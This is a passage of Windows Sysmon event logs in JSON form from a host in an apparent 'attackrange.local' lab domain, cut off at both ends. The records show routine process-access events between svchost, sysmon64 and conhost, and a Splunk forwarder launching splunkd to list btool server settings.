{E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3426,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3427,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3428,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3429,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3430,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3431,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3432,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-001063700500}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-001063700500}","TargetProcessId":"4136","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3433,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.158\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-001024710500}\r\nProcessId: 4148\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServerListener: --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-001063700500}\r\nParentProcessId: 4136\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list httpServerListener: --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.158","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-001024710500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServerListener: 